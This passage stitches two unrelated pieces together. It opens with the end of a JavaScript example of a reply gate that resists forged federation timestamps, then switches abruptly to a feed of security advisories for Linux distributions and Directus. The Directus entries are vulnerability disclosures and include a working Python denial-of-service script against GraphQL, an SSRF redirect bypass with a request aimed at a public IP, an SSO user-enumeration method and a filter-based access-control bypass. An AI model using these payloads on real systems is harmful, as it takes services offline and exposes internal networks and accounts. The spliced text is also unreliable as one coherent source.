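  // preceded it, whatever timestamp the remote server wrote. Unknown events are
  // treated as not visible rather than leaked.
  mayQuoteUsingLocalTs(original, membership) {
    const joinedAt = this.seenAt.get(membership.event_id);
    const sentAt = this.seenAt.get(original.event_id);
    if (joinedAt === undefined || sentAt === undefined) return false;
    return joinedAt <= sentAt;
  }
}

// Constructed room events (only the fields the gate reads). A message is bridged at
// t=1000; a homeserver joins at t=2000 but stamps its own m.room.member event with 0.
function scenario() {
  let clock = 0;
  const gate = new ReplyGate(() => clock);

  const original = { event_id: '$msg1', type: 'm.room.message', origin_server_ts: 1000 };
  clock = 1000;
  gate.observe(original);

  const forgedJoin = { event_id: '$join_evil', type: 'm.room.member', origin_server_ts: 0 };
  clock = 2000;
  gate.observe(forgedJoin);

  return {
    leaksWithServerTs: gate.mayQuoteTrustingServerTs(original, forgedJoin), // true: leaked
    leaksWithLocalTs: gate.mayQuoteUsingLocalTs(original, forgedJoin),      // false: blocked
  };
}
```

The same shape applies to any federated protocol: a value the peer produces can feed display logic, but an access decision needs a clock, counter or membership record the local service maintains itself.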
05.07.2024 05:15:10alpinelinux[ALPINE:CVE-2024-36041] plasma-workspace vulnerability[From CVE-2024-36041] KSmserver in KDE Plasma Workspace (aka plasma-workspace) before 5.27.11.1 and 6.x before 6.0.5.1 allows connections via ICE based purely on the host, i.e., all local connections are accepted. This allows another user on the same machine to gain access to the session manager, e.g., use the session-restore feature to execute arbitrary code as the victim (on the next boot) via earlier use of the /tmp directory.https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-36041
05.07.2024 03:00:00debian[DSA-5726-1] krb5 security updatehttps://secdb.nttzen.cloud/security-advisory/debian/DSA-5726-1
05.07.2024 03:00:00gentoo[GLSA-202407-12] podman: Multiple Vulnerabilities (high)Multiple vulnerabilities have been discovered in Podman, the worst of which could lead to privilege escalation.https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202407-12
05.07.2024 03:00:00gentoo[GLSA-202407-14] TigerVNC: Multiple Vulnerabilities (normal)Multiple vulnerabilities have been discovered in TigerVNC, the worst of which could lead to remote code execution.https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202407-14
05.07.2024 03:00:00gentoo[GLSA-202407-10] Sofia-SIP: Multiple Vulnerabilities (high)Multiple vulnerabilities have been discovered in Sofia-SIP, the worst of which can lead to remote code execution.https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202407-10
05.07.2024 03:00:00gentoo[GLSA-202407-11] PuTTY: Multiple Vulnerabilities (high)Multiple vulnerabilities have been discovered in PuTTY, the worst of which could lead to compromised keys.https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202407-11
05.07.2024 03:00:00gentoo[GLSA-202407-13] WebKitGTK+: Multiple Vulnerabilities (high)Multiple vulnerabilities have been discovered in WebKitGTK+, the worst of which could lead to arbitrary code executionhttps://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202407-13
05.07.2024 03:00:00gentoo[GLSA-202407-15] GraphicsMagick: Multiple Vulnerabilities (normal)Multiple vulnerabilities have been discovered in GraphicsMagick, the worst of which could lead to arbitrary code execution.https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202407-15
05.07.2024 03:00:00gentoo[GLSA-202407-16] GNU Coreutils: Buffer Overflow Vulnerability (high)A vulnerability has been discovered in Coreutils, which can lead to a heap buffer overflow and possibly aribitrary code execution.https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202407-16
05.07.2024 03:00:00gentoo[GLSA-202407-17] BusyBox: Multiple Vulnerabilities (normal)Multiple vulnerabilities have been discovered in BusyBox, the worst of which could lead to arbitrary code execution.https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202407-17
05.07.2024 03:00:00gentoo[GLSA-202407-18] Stellarium: Arbitrary File Write (normal)A vulnerability has been discovered in Stellarium, which can lead to arbitrary file writes.https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202407-18
05.07.2024 23:39:43maven[MAVEN:GHSA-WM9W-RJJ3-J356] Apache Tomcat - Denial of Service (high)Improper Handling of Exceptional Conditions, Uncontrolled Resource Consumption vulnerability in Apache Tomcat. When processing an HTTP/2 stream, Tomcat did not handle some cases of excessive HTTP headers correctly. This led to a miscounting of active HTTP/2 streams which in turn led to the use of an incorrect infinite timeout which allowed connections to remain open which should have been closed.This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.0-M20, from 10.1.0-M1 through 10.1.24, from 9.0.0-M1 through 9.0.89.Users are recommended to upgrade to version 11.0.0-M21, 10.1.25 or 9.0.90, which fixes the issue.https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-WM9W-RJJ3-J356
06.07.2024 03:00:00gentoo[GLSA-202407-19] Mozilla Thunderbird: Multiple Vulnerabilities (high)Multiple vulnerabilities have been discovered in Mozilla Thunderbird, the worst of which could lead to remote code execution.https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202407-19
06.07.2024 03:00:00gentoo[GLSA-202407-20] KDE Plasma Workspaces: Privilege Escalation (high)A vulnerability has been discovered in KDE Plasma Workspaces, which can lead to privilege escalation.https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202407-20
06.07.2024 03:00:00gentoo[GLSA-202407-21] X.Org X11 library: Multiple Vulnerabilities (normal)Multiple vulnerabilities have been discovered in the X.Org X11 library, the worst of which could lead to a denial of service.https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202407-21
06.07.2024 03:00:00gentoo[GLSA-202407-22] Mozilla Firefox: Multiple Vulnerabilities (high)Multiple vulnerabilities have been discovered in Mozilla Firefox, the worst of which could arbitrary code execution.https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202407-22
07.07.2024 21:15:09alpinelinux[ALPINE:CVE-2024-3651] py3-idna vulnerability (medium)[From CVE-2024-3651] A vulnerability was identified in the kjd/idna library, specifically within the `idna.encode()` function, affecting version 3.6. The issue arises from the function's handling of crafted input strings, which can lead to quadratic complexity and consequently, a denial of service condition. This vulnerability is triggered by a crafted input that causes the `idna.encode()` function to process the input with considerable computational load, significantly increasing the processing time in a quadratic manner relative to the input size.https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-3651
09.07.2024 01:15:02alpinelinux[ALPINE:CVE-2024-28882] openvpn vulnerability[From CVE-2024-28882] OpenVPN 2.6.10 and earlier in a server role accepts multiple exit notifications from authenticated clients which will extend the validity of a closing sessionhttps://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-28882
08.07.2024 21:41:58 | npm | [NPM:GHSA-JGF4-VWC3-R46V] Directus Allows Single Sign-On User Enumeration (high)

### Impact
When relying on SSO providers in combination with local authentication, it can be possible to enumerate existing SSO users in the instance. This is possible because if an email address exists in Directus and belongs to a known SSO provider, it will throw a "helpful" error that the user belongs to another provider.

### Reproduction
1. Create a user using an SSO provider (`test@directus.io`).
2. Try to log in using the regular login form (or the API).
3. When using a valid email address:

| **APP** | **API** |
| --- | --- |
| ![image](https://github.com/directus/directus/assets/9389634/1da3301d-226f-46a7-bfb8-3f6fb9bc55cd) | ![image](https://github.com/directus/directus/assets/9389634/50cab310-7d1c-4241-a6be-d06542565767) |

4. When using an invalid email address:

| **APP** | **API** |
| --- | --- |
| ![image](https://github.com/directus/directus/assets/9389634/7b97659e-b49c-410b-872e-e36786b6e41e) | ![image](https://github.com/directus/directus/assets/9389634/d26ccba7-bb27-437e-991e-99c10941bbe7) |

5. Using this differing error it is possible to determine whether a specific email address is present in the Directus instance as an SSO user.

### Workarounds
When only using SSO for authentication, you can work around this issue by disabling local login using the following environment variable: `AUTH_DISABLE_DEFAULT="true"`

### References
- Implemented as feature in https://github.com/directus/directus/pull/13184
- https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/03-Identity_Management_Testing/04-Testing_for_Account_Enumeration_and_Guessable_User_Account

https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-JGF4-VWC3-R46V
08.07.2024 21:41:00 | npm | [NPM:GHSA-7HMH-PFRP-VCX4] Directus GraphQL Field Duplication Denial of Service (DoS) (moderate)

### Summary
A denial of service (DoS) attack by field duplication in GraphQL is a type of attack where an attacker exploits the flexibility of GraphQL to overwhelm a server by requesting the same field multiple times in a single query. This can cause the server to perform redundant computations and consume excessive resources, leading to a denial of service for legitimate users.

### Details
Requests to the endpoint /graphql are sent when visualizing graphs generated at a dashboard:

![image](https://github.com/directus/directus/assets/114263468/185eb60f-9092-47d4-81f4-add1a53e99c8)
![DoS5](https://github.com/directus/directus/assets/114263468/f43079f5-b9ab-4704-938f-dcb91453d464)

By modifying the data sent and duplicating the fields many times, a DoS attack is possible.

### PoC
The goal is to create a payload that generates a body like this, where the 'max' field is duplicated many times, each with the 'id' field duplicated many times inside it.

`{'query': 'query { query_4f4722ea: test_table_aggregated { max {id id id id id id id id id id } max {id id id id id id id id id id } max {id id id id id id id id id id } max {id id id id id id id id id id } max {id id id id id id id id id id } max {id id id id id id id id id id } max {id id id id id id id id id id } max {id id id id id id id id id id } max {id id id id id id id id id id } max {id id id id id id id id id id } } }'}`

Although that payload seems harmless, a bigger one leaves the service unresponsive.

The following code might serve as a PoC written in Python3:

```python
# Field Duplication DoS
# GitHub @asantof
import requests

## CHANGE THESE VALUES: url, auth_token, query_name, collection_name
url = 'http://0.0.0.0:8055/graphql'
auth_token = ''
query_name = 'query_XXXXX'
collection_name = ''

headers = {
    'Content-Type': 'application/json',
    'Authorization': f'Bearer {auth_token}',
}

id_payload = 'id ' * 200
max_payload = 'max {' + id_payload + ' } '
full_payload = max_payload * 200

data = {
    'query': 'query { ' + query_name + ': ' + collection_name + '_aggregated { ' + full_payload + ' } }'
}

print(data)
response = requests.post(url, headers=headers, json=data)
print(response.json())
```

![DoS4](https://github.com/directus/directus/assets/114263468/965e50bc-24dc-405c-a0f1-c973bd4f378d)

After running it the service will be unresponsive for a while:

![DoS](https://github.com/directus/directus/assets/114263468/9865acc1-9b82-4d3d-8929-cf32500ce14d)

### Impact
The vulnerability impacts the service's availability by causing it to become unresponsive for a few minutes. An attacker could continuously send this request to the server, rendering the service unavailable indefinitely.

https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-7HMH-PFRP-VCX4
08.07.2024 21:37:54 | npm | [NPM:GHSA-HXGM-GHMV-XJJM] Directus incorrectly handles `_in` filter (moderate)

### Summary
Directus >=9.23.0, <=v10.5.3 improperly handles the `_in` and `_nin` operators. It evaluates empty arrays as valid, so expressions like `{"role": {"_in": $CURRENT_USER.some_field}}` would evaluate to true, allowing the request to pass.

### Details
This results in Broken Access Control because the rule fails to do what it was intended to do: pass the rule if **field** matches any of the **values** (ref: https://docs.directus.io/reference/filter-rules.html#filter-operators). In my example this would translate to "Pass rule if **<collection>.role** matches any of **[]**", which should fail. This instead passes in Directus >=v9.23.0, <=v10.5.3.

### PoC
`{"role": {"_in": $CURRENT_USER.some_field}}` field validation would pass if `$CURRENT_USER.some_field` is null.

Real scenario: Using https://github.com/u12206050/directus-extension-role-chooser with the specified versions of Directus (I tested on 10.0.0) allows users with access to this feature to set their role to whatever role if they don't have any roles assigned (user_roles.role is left with the default value, null), despite the validation rule being

```yaml
validation:
  role:
    _in: $CURRENT_USER.user_roles.role
```

The latest version of Directus (v10.8.3 and above) handles the above validation rule correctly.

### Impact
Permissions fail open for setups relying on this filter, which can lead to users getting access to things they're not supposed to.

https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-HXGM-GHMV-XJJM
08.07.2024 20:56:11 | ubuntu | [USN-6885-1] Apache HTTP Server vulnerabilities (critical) | Several security issues were fixed in Apache HTTP Server. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6885-1
08.07.2024 22:06:20 | npm | [NPM:GHSA-8P72-RCQ4-H6PW] Directus Blind SSRF On File Import (moderate)

### Summary
There was already a reported SSRF vulnerability via file import: [https://github.com/directus/directus/security/advisories/GHSA-j3rg-3rgm-537h](https://github.com/directus/directus/security/advisories/GHSA-j3rg-3rgm-537h)

It was fixed by resolving all DNS names and checking whether the requested IP is an internal IP address. However, it is possible to bypass this security measure and execute an SSRF using redirects. Directus allows redirects when importing a file from the URL and does not check the resulting URL. Thus, it is possible to execute a request to an internal IP, for example to 127.0.0.1.

However, it is a blind SSRF, because Directus also uses a response interception technique to get the information about the connection from the socket directly, and it does not show a response if the IP address is internal (nice fix, by the way 🙂).

But the blindness does not fully mitigate the impact of the vulnerability. The blind SSRF is still exploitable in real-life scenarios, because there could be vulnerable software inside the network which can be exploited with a GET request. I will show the example in the PoC. Also, you can check the [HackTricks](https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/ssrf-vulnerable-platforms) page with some known cases.

### Details
_Give all details on the vulnerability. Pointing to the incriminated source code is very helpful for the maintainer._

### PoC
For testing I used docker compose with the latest Directus version.

Here is my docker compose file:

```yaml
version: "3"
services:
  directus:
    image: directus/directus:10.8.3
    ports:
      - 8055:8055
    volumes:
      - ./database:/directus/database
      - ./uploads:/directus/uploads
      - ./extensions:/directus/extensions
    environment:
      KEY: "redacted"
      SECRET: "redacted"
      ADMIN_EMAIL: "admin@example.com"
      ADMIN_PASSWORD: "redacted"
      DB_CLIENT: "sqlite3"
      DB_FILENAME: "/directus/database/data.db"
```

As a first step it is needed to set up a redirect server which will redirect the incoming request to some internal URL. I did it on my VPS with a public IP.

<img width="1035" alt="image" src="https://user-images.githubusercontent.com/156416961/296198555-870898b2-7b8a-4857-a8fe-5e28e85241b0.png">

After that I set up a simple HTTP server emulating the vulnerable application inside the internal network. It just executes any shell command provided in the cmd GET parameter.

<img width="454" alt="image" src="https://user-images.githubusercontent.com/156416961/296198963-4465fa15-c6d6-4e8c-92a0-a2ae334ba79f.png">

After that the Directus import functionality was used.

<img width="930" alt="image" src="https://user-images.githubusercontent.com/156416961/296199457-d5d8eb2d-1ca8-442e-b1bf-15ddb0f1947d.png">

It initiates the following HTTP request:

```http
POST /files/import HTTP/1.1
Host: 127.0.0.1:8055
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Authorization: Bearer redacteed
Content-Type: application/json
Content-Length: 44
Origin: http://127.0.0.1:8055
Connection: close
Referer: http://127.0.0.1:8055/admin/files/+
Cookie: directus_refresh_token=redacted
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

{"url":"http://94.103.84.233:801","data":{}}
```

It can be seen on the redirect server that the request came to it.

![](https://user-images.githubusercontent.com/156416961/296200143-5afc04e8-3651-4f6f-98d2-1f9f7cd3919a.jpg)

And we can also see the request in the localhost server (the same host as Directus), which confirms the bypass and the SSRF.

<img width="437" alt="image" src="https://user-images.githubusercontent.com/156416961/296201651-a9b61f5d-0ccd-4e3e-b137-e82fda8f5347.png">

And the rce_poc file was created.

<img width="538" alt="image" src="https://user-images.githubusercontent.com/156416961/296201869-fed5fa94-ece5-497d-a091-c422b1f540a0.png">

### Impact
The impact is blind SSRF. Using it an attacker can initiate HTTP GET requests to the internal network. For example, it can be used to exploit some GET-based vulnerabilities of other software in the internal network.

### Fix proposition
I think there are two ways to fix this vulnerability:
- Disallow redirects for the import requests
- Check the Location header in the import request response if it is present. Drop the request if the Location URL points to an internal IP.

https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-8P72-RCQ4-H6PW
08.07.2024 14:59:21 | ubuntu | [USN-6884-1] Nova vulnerability (medium) | Nova would allow unintended access to files over the network. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6884-1
08.07.2024 14:55:01 | ubuntu | [USN-6883-1] OpenStack Glance vulnerability (medium) | OpenStack Glance would allow unintended access to files over the network. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6883-1
08.07.2024 14:49:10 | ubuntu | [USN-6882-1] Cinder vulnerability (medium) | Cinder would allow unintended access to files over the network. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6882-1
08.07.2024 12:37:45 | ubuntu | [USN-6881-1] Exim vulnerability (high) | Exim could be made to allow response injection if it received a specially crafted response. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6881-1
08.07.2024 17:59:51 | maven | [MAVEN:GHSA-H658-QQV9-QWV8] Apache NiFi vulnerable to Cross-site Scripting (moderate) | Apache NiFi 1.10.0 through 1.26.0 and 2.0.0-M1 through 2.0.0-M3 support a description field in the Parameter Context configuration that is vulnerable to cross-site scripting. An authenticated user, authorized to configure a Parameter Context, can enter arbitrary JavaScript code, which the client browser will execute within the session context of the authenticated user. Upgrading to Apache NiFi 1.27.0 or 2.0.0-M4 is the recommended mitigation. | https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-H658-QQV9-QWV8
08.07.2024 14:18:04 | almalinux | [ALSA-2024:4351] virt:rhel and virt-devel:rhel security and bug fix update (low) | virt:rhel and virt-devel:rhel security and bug fix update | https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:4351
08.07.2024 03:00:00 | oraclelinux | [ELSA-2024-4349] kernel security and bug fix update (moderate)

[5.14.0-427.24.1_4.OL9]
- Disable UKI signing [Orabug: 36571828]
- Update Oracle Linux certificates (Kevin Lyons)
- Disable signing for aarch64 (Ilya Okomin)
- Oracle Linux RHCK Module Signing Key was added to the kernel trusted keys list (olkmod_signing_key.pem) [Orabug: 29539237]
- Update x509.genkey [Orabug: 24817676]
- Conflict with shim-ia32 and shim-x64 <= 15.3-1.0.5
- Remove upstream reference during boot (Kevin Lyons) [Orabug: 34729535]
- Add Oracle Linux IMA certificates

[5.14.0-427.24.1_4]
- net/bnx2x: Prevent access to a freed page in page_pool (Michal Schmidt) [RHEL-43272 RHEL-23117]
- bnx2x: new flag for track HW resource allocation (Michal Schmidt) [RHEL-43272 RHEL-23117]
- bnx2x: fix page fault following EEH recovery (Michal Schmidt) [RHEL-43272 RHEL-23117]
- bnx2x: fix pci device refcount leak in bnx2x_vf_is_pcie_pending() (Michal Schmidt) [RHEL-43272 RHEL-23117]
- bnx2x: fix potential memory leak in bnx2x_tpa_stop() (Michal Schmidt) [RHEL-43272 RHEL-23117]
- xen-netfront: Add missing skb_mark_for_recycle (Vitaly Kuznetsov) [RHEL-37626 RHEL-36573] {CVE-2024-27393}
- tools/power/turbostat: Fix uncore frequency file string (David Arcari) [RHEL-34953 RHEL-29239]
- tools/power turbostat: Expand probe_intel_uncore_frequency() (David Arcari) [RHEL-34953 RHEL-29239]
- net/mlx5e: fix a potential double-free in fs_any_create_groups (Kamal Heib) [RHEL-38972 RHEL-37093] {CVE-2023-52667}
- crypto: qat - Fix typo (Vladis Dronov) [RHEL-38546 RHEL-35816]
- crypto: qat - Fix ADF_DEV_RESET_SYNC memory leak (Vladis Dronov) [RHEL-38546 RHEL-35816] {CVE-2024-26974}
- crypto: qat - specify firmware files for 402xx (Vladis Dronov) [RHEL-38546 RHEL-35816]
- crypto: qat - validate slices count returned by FW (Vladis Dronov) [RHEL-38546 RHEL-35816]
- crypto: qat - improve error logging to be consistent across features (Vladis Dronov) [RHEL-38546 RHEL-35816]
- crypto: qat - improve error message in adf_get_arbiter_mapping() (Vladis Dronov) [RHEL-38546 RHEL-35816]
- crypto: qat - implement dh fallback for primes > 4K (Vladis Dronov) [RHEL-38546 RHEL-35816]
- crypto: qat - Fix spelling mistake 'Invalide' -> 'Invalid' (Vladis Dronov) [RHEL-38546 RHEL-35816]
- crypto: qat - Avoid -Wflex-array-member-not-at-end warnings (Vladis Dronov) [RHEL-38546 RHEL-35816]
- crypto: qat - implement interface for live migration (Vladis Dronov) [RHEL-38546 RHEL-35816]
- crypto: qat - add interface for live migration (Vladis Dronov) [RHEL-38546 RHEL-35816]
- crypto: qat - add bank save and restore flows (Vladis Dronov) [RHEL-38546 RHEL-35816]
- crypto: qat - expand CSR operations for QAT GEN4 devices (Vladis Dronov) [RHEL-38546 RHEL-35816]
- crypto: qat - rename get_sla_arr_of_type() (Vladis Dronov) [RHEL-38546 RHEL-35816]
- crypto: qat - relocate CSR access code (Vladis Dronov) [RHEL-38546 RHEL-35816]
- crypto: qat - move PFVF compat checker to a function (Vladis Dronov) [RHEL-38546 RHEL-35816]
- crypto: qat - relocate and rename 4xxx PF2VM definitions (Vladis Dronov) [RHEL-38546 RHEL-35816]
- crypto: qat - adf_get_etr_base() helper (Vladis Dronov) [RHEL-38546 RHEL-35816]
- redhat/configs: Add CONFIG_CRYPTO_DEV_QAT_420XX (Vladis Dronov) [RHEL-38546 RHEL-35816]
- crypto: qat - make ring to service map common for QAT GEN4 (Vladis Dronov) [RHEL-38546 RHEL-35816]
- crypto: qat - fix ring to service map for dcc in 420xx (Vladis Dronov) [RHEL-38546 RHEL-35816]
- crypto: qat - fix ring to service map for dcc in 4xxx (Vladis Dronov) [RHEL-38546 RHEL-35816]
- crypto: qat - fix comment structure (Vladis Dronov) [RHEL-38546 RHEL-35816]
- crypto: qat - remove unnecessary description from comment (Vladis Dronov) [RHEL-38546 RHEL-35816]
- crypto: qat - remove double initialization of value (Vladis Dronov) [RHEL-38546 RHEL-35816]
- crypto: qat - avoid division by zero (Vladis Dronov) [RHEL-38546 RHEL-35816]
- crypto: qat - removed unused macro in adf_cnv_dbgfs.c (Vladis Dronov) [RHEL-38546 RHEL-35816]
- crypto: qat - remove unused macros in qat_comp_alg.c (Vladis Dronov) [RHEL-38546 RHEL-35816]
- crypto: qat - uninitialized variable in adf_hb_error_inject_write() (Vladis Dronov) [RHEL-38546 RHEL-35816]
- Documentation: qat: fix auto_reset section (Vladis Dronov) [RHEL-38546 RHEL-35816]
- crypto: qat - resolve race condition during AER recovery (Vladis Dronov) [RHEL-38546 RHEL-35816] {CVE-2024-26974}
- crypto: qat - change SLAs cleanup flow at shutdown (Vladis Dronov) [RHEL-38546 RHEL-35816]
- crypto: qat - improve aer error reset handling (Vladis Dronov) [RHEL-38546 RHEL-35816]
- crypto: qat - limit heartbeat notifications (Vladis Dronov) [RHEL-38546 RHEL-35816]
- crypto: qat - add auto reset on error (Vladis Dronov) [RHEL-38546 RHEL-35816]
- crypto: qat - add fatal error notification (Vladis Dronov) [RHEL-38546 RHEL-35816]
- crypto: qat - re-enable sriov after pf reset (Vladis Dronov) [RHEL-38546 RHEL-35816]
- crypto: qat - update PFVF protocol for recovery (Vladis Dronov) [RHEL-38546 RHEL-35816]
- crypto: qat - disable arbitration before reset (Vladis Dronov) [RHEL-38546 RHEL-35816]
- crypto: qat - add fatal error notify method (Vladis Dronov) [RHEL-38546 RHEL-35816]
- crypto: qat - add heartbeat error simulator (Vladis Dronov) [RHEL-38546 RHEL-35816]
- crypto: qat - use kcalloc_node() instead of kzalloc_node() (Vladis Dronov) [RHEL-38546 RHEL-35816]
- crypto: qat - avoid memcpy() overflow warning (Vladis Dronov) [RHEL-38546 RHEL-35816]
- crypto: qat - fix arbiter mapping generation algorithm for QAT 402xx (Vladis Dronov) [RHEL-38546 RHEL-35816]
- crypto: qat - generate dynamically arbiter mappings (Vladis Dronov) [RHEL-38546 RHEL-35816]
- crypto: qat - add support for ring pair level telemetry (Vladis Dronov) [RHEL-38546 RHEL-35816]
- crypto: qat - add support for device telemetry (Vladis Dronov) [RHEL-38546 RHEL-35816]
- crypto: qat - add admin msgs for telemetry (Vladis Dronov) [RHEL-38546 RHEL-35816]
- crypto: qat - include pci.h for GET_DEV() (Vladis Dronov) [RHEL-38546 RHEL-35816]
- crypto: qat - add support for 420xx devices (Vladis Dronov) [RHEL-38546 RHEL-35816]
- crypto: qat - move fw config related structures (Vladis Dronov) [RHEL-38546 RHEL-35816]
- crypto: qat - relocate portions of qat_4xxx code (Vladis Dronov) [RHEL-38546 RHEL-35816]
- crypto: qat - change signature of uof_get_num_objs() (Vladis Dronov) [RHEL-38546 RHEL-35816]
- crypto: qat - relocate and rename get_service_enabled() (Vladis Dronov) [RHEL-38546 RHEL-35816]
- seq_file: add helper macro to define attribute for rw file (Vladis Dronov) [RHEL-38546 RHEL-35816]
- minmax: Introduce {min,max}_array() (Vladis Dronov) [RHEL-38546 RHEL-35816]

[5.14.0-427.23.1_4]
- net/mlx5e: Fix operation precedence bug in port timestamping napi_poll context (Kamal Heib) [RHEL-34050 RHEL-30492] {CVE-2023-52626}
- blk-mq: add helper for checking if one CPU is mapped to specified hctx (Ming Lei) [RHEL-38595 RHEL-36684]
- net/sched: flower: Add lock protection when remove filter handle (Petr Oros) [RHEL-35672 RHEL-33379]
- Bluetooth: Avoid potential use-after-free in hci_error_reset (David Marlin) [RHEL-33913 RHEL-31828] {CVE-2024-26801}
- net: hns3: do not allow call hns3_nic_net_open repeatedly (Jose Ignacio Tornos Martinez) [RHEL-38933 RHEL-37707] {CVE-2021-47400}
- tmpfs: fix Documentation of noswap and huge mount options (Nico Pache) [RHEL-38252 RHEL-31975]
- shmem: add support to ignore swap (Chris von Recklinghausen) [RHEL-38252 RHEL-31975]
- shmem: update documentation (Chris von Recklinghausen) [RHEL-38252 RHEL-31975]
- shmem: skip page split if we're not reclaiming (Chris von Recklinghausen) [RHEL-38252 RHEL-31975]
- shmem: move reclaim check early on writepages() (Chris von Recklinghausen) [RHEL-38252 RHEL-31975]
- shmem: set shmem_writepage() variables early (Chris von Recklinghausen) [RHEL-38252 RHEL-31975]
- shmem: remove check for folio lock on writepage() (Chris von Recklinghausen) [RHEL-38252 RHEL-31975]
- ice: Add automatic VF reset on Tx MDD events (Petr Oros) [RHEL-39083 RHEL-36317]
- net/ipv6: SKB symmetric hash should incorporate transport ports (Ivan Vecera) [RHEL-37641 RHEL-36218]
- ipv6: sr: fix memleak in seg6_hmac_init_algo (Hangbin Liu) [RHEL-37669 RHEL-37511]
- ipv6: sr: fix missing sk_buff release in seg6_input_core (Hangbin Liu) [RHEL-37669 RHEL-37511]
- ipv6: sr: fix invalid unregister error path (Hangbin Liu) [RHEL-37669 RHEL-37511]
- ipv6: sr: fix incorrect unregister order (Hangbin Liu) [RHEL-37669 RHEL-37511]
- ipv6: sr: add missing seg6_local_exit (Hangbin Liu) [RHEL-37669 RHEL-37511]
- block: fix q->blkg_list corruption during disk rebind (Ming Lei) [RHEL-36687 RHEL-33577]
- ice: fix uninitialized dplls mutex usage (Petr Oros) [RHEL-36716 RHEL-36283]
- ice: fix pin phase adjust updates on PF reset (Petr Oros) [RHEL-36716 RHEL-36283]
- ice: fix dpll periodic work data updates on PF reset (Petr Oros) [RHEL-36716 RHEL-36283]
- ice: fix dpll and dpll_pin data access on PF reset (Petr Oros) [RHEL-36716 RHEL-36283]
- ice: fix dpll input pin phase_adjust value updates (Petr Oros) [RHEL-36716 RHEL-36283]
- ice: fix connection state of DPLL and out pin (Petr Oros) [RHEL-36716 RHEL-36283]
- redhat: remove the merge subtrees script (Derek Barbosa)
- redhat: rhdocs: delete .get_maintainer.conf (Derek Barbosa)
- redhat: rhdocs: Remove the rhdocs directory (Derek Barbosa)
- net/mlx5: Properly link new fs rules into the tree (Kamal Heib) [RHEL-38954 RHEL-37422] {CVE-2024-35960}
- smb: client: fix UAF in smb2_reconnect_server() (Jay Shin) [RHEL-28943 RHEL-40177 RHEL-37273 RHEL-7986] {CVE-2024-35870}
- smb: client: remove extra @chan_count check in __cifs_put_smb_ses() (Jay Shin) [RHEL-28943 RHEL-31245]
- RHEL: enable CONFIG_AMD_ATL (Aristeu Rozanski) [RHEL-36220 RHEL-26704]
- EDAC/amd64: Use new AMD Address Translation Library (Aristeu Rozanski) [RHEL-36220 RHEL-26704]
- RAS: Introduce AMD Address Translation Library (Aristeu Rozanski) [RHEL-36220 RHEL-26704]

https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-4349
08.07.2024 03:00:00 | oraclelinux | [ELSA-2024-4371] buildah security update (important)

[1.33.7-3.0.1]
- Drop nmap-ncat requirement and skip ignore-socket test case [Orabug: 34117178]

[2:1.33.7-3]
- rebuild for CVE-2024-1394
- Resolves: RHEL-24307

https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-4371

08.07.2024 03:00:00 | oraclelinux | [ELSA-2024-4376] libreswan security update (moderate)

[4.12-2.0.1.4]
- Add libreswan-oracle.patch to detect Oracle Linux distro

[4.12-2.4]
- Fix CVE-2024-3652 (RHEL-32482)

https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-4376

08.07.2024 03:00:00 | oraclelinux | [ELSA-2024-4378] podman security update (important)

[4.9.4-5.0.1]
- Fixes issue of podman execvp error while using podmansh [Orabug: 36073625]
- Improved saving remote build context to tarfile in Podman daemon [Orabug: 36495655]
- Add devices on container startup, not on creation
- Backport fast gzip for compression [Orabug: 36420418]
- overlay: Put should ignore ENINVAL for Unmount [Orabug: 36234694]
- Drop nmap-ncat requirement and skip ignore-socket test case [Orabug: 34117404]

[4:4.9.4-5]
- rebuild for CVE-2024-1394
- Resolves: RHEL-40793

https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-4378

08.07.2024 03:00:00 | oraclelinux | [ELSA-2024-4379] gvisor-tap-vsock security update (important)

[6:0.7.3-4]
- rebuild for CVE-2024-1394
- Resolves: RHEL-24315

https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-4379
